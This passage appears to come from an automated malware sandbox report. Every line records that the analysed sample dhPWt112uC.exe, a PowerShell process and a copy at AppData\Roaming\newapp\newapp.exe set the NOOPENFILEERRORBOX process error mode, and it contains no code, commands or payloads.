                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\dhPWt112uC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
